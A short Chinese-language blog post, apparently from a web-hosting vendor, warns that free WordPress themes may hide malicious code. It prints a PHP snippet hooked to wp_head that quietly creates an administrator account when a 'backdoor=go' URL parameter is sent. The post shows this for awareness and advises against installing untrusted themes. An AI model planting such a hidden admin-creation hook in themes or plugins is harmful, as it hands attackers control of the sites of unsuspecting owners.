WordPress是目前流行的博客cms建站系统,justhost虚拟主机的用户很多都有在使用。一般我们会在主机内自己手工或者一键安装wordpress源码,然后在网上收集一些自己喜欢的主题,大部分都是免费主题,但这些免费主题中难免会有一些别有用心的人所利用,比如:加入暗链、广告或者注入漏洞等。下面我们来看一下免费wordpress主题的一组代码:

 

add_action('wp_head', 'holeinthewall'); 

function holeinthewall() { 

If ($_GET[‘backdoor’] == 'go') { 

require('wp-includes/registration.php'); 

If (!username_exists('username')) { 

$user_id = wp_create_user('username', 'password'); 

$user = new WP_User($user_id); 

$user->set_role('administrator'); 

}

 

这段代码的意思就是可以自动添加管理员,此代码放在主题中的funcon.php文件中就会自动添加管理员username,密码password。只要有了网站后台的账号,那么网站的安全性就不言而喻了。这只是其中一项,相信免费主题还有更多的恶意代码,如果这种代码够多,那么我们排查起来难度是很大的,所以小编建议大家在使用justhost虚拟主机时不要自己随意安装网上发布的免费主题,可以在wordpress后台安装推荐的主题。

 

推荐阅读:justhost一键安装wordpress教程




评论被关闭

在线客服